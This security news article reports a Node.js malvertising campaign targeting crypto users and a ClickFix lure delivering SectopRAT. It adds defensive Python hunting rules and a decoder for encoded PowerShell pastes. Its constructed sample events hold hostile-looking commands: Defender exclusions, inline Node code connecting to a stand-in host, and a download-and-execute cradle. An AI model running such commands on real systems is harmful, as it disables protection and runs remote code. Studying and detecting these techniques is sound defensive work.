Microsoft Warns of Ongoing Node.js-Based Malware Campaign Targeting Crypto Users

Arsalan Rathore

April 18, 2025
Updated on April 18, 2025

Microsoft has issued an alert about an ongoing malvertising campaign that abuses the Node.js runtime to deliver malware built to steal sensitive data and exfiltrate system information.

The campaign, which dates back to October 2024, primarily targets cryptocurrency enthusiasts. Attackers lure victims by promoting fake versions of popular trading platforms like Binance and TradingView, tricking them into downloading malicious installers from deceptive websites.

These installers come bundled with a malicious dynamic-link library named “CustomActions.dll” that runs during installation. The DLL collects basic system details using Windows Management Instrumentation (WMI) and creates a scheduled task so the infection survives reboots.

To maintain the illusion of legitimacy, the DLL also opens the real cryptocurrency trading site in a window launched through “msedge_proxy.exe,” a legitimate Microsoft Edge component that displays a web page as a standalone app window. Because the victim sees the genuine site in what looks like a normal application, the installer draws no suspicion.

While the victim is distracted, the scheduled task runs PowerShell commands that fetch additional scripts from a remote server. These scripts add Microsoft Defender exclusions for both the PowerShell process and the malware’s working directory, so later stages dropped there are never scanned.

The next stage downloads a compressed archive containing the Node.js runtime and a compiled JavaScript (.jsc) file, which carries V8 bytecode rather than readable source and therefore resists casual inspection. The Node.js executable runs the .jsc payload, which establishes outbound connections and likely harvests sensitive browser data.

Microsoft also observed an alternate infection route using the ClickFix technique. In this version, a PowerShell command pasted by the victim retrieves the Node.js binary and passes the JavaScript to it inline on the command line, so no script file is written to disk.
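The chain described above (a scheduled task that launches PowerShell, Defender exclusions added from PowerShell, a Node.js binary running from a user-writable path or executing inline code, and msedge_proxy.exe spawned by an installer) gives a detection engineer several process-creation signals to hunt on. The following Python is an added example, not Microsoft’s detection logic and not code from the campaign: it encodes those signals as simple rules and runs them over constructed events modelled on Sysmon Event ID 1 fields. The field names, file paths, and the assumption that msedge_proxy.exe is normally started by msedge.exe or explorer.exe are all assumptions for illustration.

```python
"""Hunting rules for the Node.js malvertising chain, run over constructed
process-creation events. Added example; paths and parent-process expectations
are assumptions, not published telemetry."""
import re
from pathlib import PureWindowsPath

# Constructed sample events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    # 0. Benign: a developer runs a script with the system-wide Node.js install.
    {"parent": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r'"C:\Program Files\nodejs\node.exe" server.js'},
    # 1. Stage 2: PowerShell adds Defender exclusions for itself and the drop directory.
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -w hidden -c "Add-MpPreference -ExclusionProcess powershell.exe; Add-MpPreference -ExclusionPath C:\Users\Public\upd"'},
    # 2. Stage 3: a downloaded Node.js runtime executes a compiled .jsc file.
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Public\upd\node.exe",
     "cmdline": r"C:\Users\Public\upd\node.exe C:\Users\Public\upd\loader.jsc"},
    # 3. ClickFix variant: JavaScript passed inline to node on the command line.
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\node.exe",
     "cmdline": 'node.exe -e "const n=require(\'net\'); n.connect(443, \'example.invalid\')"'},
    # 4. Decoy: msedge_proxy.exe spawned by an installer process instead of Edge/Explorer.
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe",
     "cmdline": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --app=https://www.binance.com/'},
    # 5. Benign: an admin schedules a backup tool (no PowerShell involved).
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /tn Backup /tr C:\Tools\backup.exe /sc daily"},
]

# Assumption: Node.js is only expected to run from its standard install directories.
TRUSTED_NODE_DIRS = (r"c:\program files\nodejs", r"c:\program files (x86)\nodejs")
# Assumption: Edge's app-window host is normally started by Edge itself or by the shell.
EXPECTED_EDGE_PROXY_PARENTS = {"msedge.exe", "explorer.exe"}


def basename(path):
    return PureWindowsPath(path).name.lower()


def rule_defender_exclusion(ev):
    """PowerShell adding a Defender path/process/extension exclusion."""
    c = ev["cmdline"]
    return bool(basename(ev["image"]) in {"powershell.exe", "pwsh.exe"}
                and re.search(r"add-mppreference", c, re.I)
                and re.search(r"-exclusion(path|process|extension)", c, re.I))


def rule_node_untrusted_or_inline(ev):
    """node.exe outside its install dir, running inline code, or loading V8 bytecode (.jsc)."""
    if basename(ev["image"]) != "node.exe":
        return False
    image_dir = str(PureWindowsPath(ev["image"]).parent).lower()
    untrusted = not image_dir.startswith(TRUSTED_NODE_DIRS)
    inline = re.search(r"\s(-e|--eval|-p|--print)\s", ev["cmdline"]) is not None
    bytecode = re.search(r"\.jsc\b", ev["cmdline"], re.I) is not None
    return untrusted or inline or bytecode


def rule_edge_proxy_decoy(ev):
    """msedge_proxy.exe started by something other than Edge or the shell."""
    return (basename(ev["image"]) == "msedge_proxy.exe"
            and basename(ev["parent"]) not in EXPECTED_EDGE_PROXY_PARENTS)


def rule_schtasks_powershell(ev):
    """A scheduled task created whose action is PowerShell (persistence)."""
    c = ev["cmdline"].lower()
    return basename(ev["image"]) == "schtasks.exe" and "/create" in c and "powershell" in c


RULES = [
    ("defender_exclusion", rule_defender_exclusion),
    ("node_untrusted_or_inline", rule_node_untrusted_or_inline),
    ("edge_proxy_decoy", rule_edge_proxy_decoy),
    ("schtasks_powershell", rule_schtasks_powershell),
]


def hunt(events):
    """Return (event_index, rule_name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for idx, name in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['cmdline']}")
```

The two benign events exercise the false-positive side: a developer running node.exe from its install directory and an admin creating a scheduled task for a signed tool should not fire. In production these rules would run against real EDR or Sysmon telemetry, and the trusted-directory and parent-process lists would be tuned to the estate.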

“Node.js, an open-source JavaScript runtime used widely by developers, is now being misused by attackers to camouflage malicious activity within seemingly legitimate applications,” Microsoft noted. “This technique allows them to bypass traditional security measures and maintain persistence in target environments.”

Separately, cybersecurity firm CloudSEK reported another case of social engineering built around a fake PDF-to-DOCX converter website that mimics PDF Candy. The bogus site, hosted at candyxpdf[.]com, uses the ClickFix tactic to trick users into running encoded PowerShell commands. Those commands install SectopRAT (aka ArechClient2), an information-stealing malware.

Security researcher Varun Ajmera highlighted that the attackers painstakingly cloned the real website’s design and registered similar domains to deceive users more effectively.
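A ClickFix lure of this kind hands the victim a one-liner that typically hides its real payload behind PowerShell’s -EncodedCommand switch (Base64 over UTF-16LE text). The following Python is an added example, not CloudSEK’s analysis and not the command served by the site above: it decodes such a command, accepting the common abbreviations of the switch, and flags the usual warning signs. The sample command it decodes is constructed here for illustration and points at a non-routable hostname.

```python
"""Triage helper for ClickFix-style 'paste this into Run/PowerShell' lures.
Added example: decodes PowerShell -EncodedCommand (Base64 of UTF-16LE) and
checks a few indicators. The sample command is constructed, not real."""
import base64
import re

# Constructed payload: a download cradle piped into Invoke-Expression.
SAMPLE_PLAINTEXT = "iwr https://example.invalid/update.ps1 -UseBasicParsing | iex"
SAMPLE_CLIPBOARD = (
    "powershell -w hidden -ep bypass -enc "
    + base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16le")).decode("ascii")
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
_ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.I)

# Indicators checked on the outer command line.
OUTER_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}
# Indicators checked on the decoded payload.
PAYLOAD_INDICATORS = {
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient|start-bitstransfer)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}


def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand, or None if absent or malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Decode a pasted command and return (decoded_payload, sorted indicator names)."""
    decoded = decode_encoded_command(cmdline)
    hits = {name for name, rx in OUTER_INDICATORS.items() if rx.search(cmdline)}
    if decoded is not None:
        hits.add("encoded_command")
        hits.update(name for name, rx in PAYLOAD_INDICATORS.items() if rx.search(decoded))
    return decoded, sorted(hits)


if __name__ == "__main__":
    payload, indicators = triage(SAMPLE_CLIPBOARD)
    print("decoded:", payload)
    print("indicators:", ", ".join(indicators))
```

A hidden window, an execution-policy bypass, an encoded command, a download cradle, and Invoke-Expression together are the signature of a ClickFix paste; a plain `powershell -c Get-Date` yields no indicators at all, which is the check that keeps the helper from flagging ordinary administration.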

Meanwhile, phishing campaigns are also on the rise, with cybercriminals using PHP-based kits to impersonate HR departments. These scams aim to hijack access to payroll systems and reroute salary payments to accounts controlled by the attackers.

Some of this activity has been linked to a threat group known as Payroll Pirates, which uses malicious ads and spoofed HR portals, often placed through Google’s sponsored search results, to harvest employee credentials and 2FA codes.
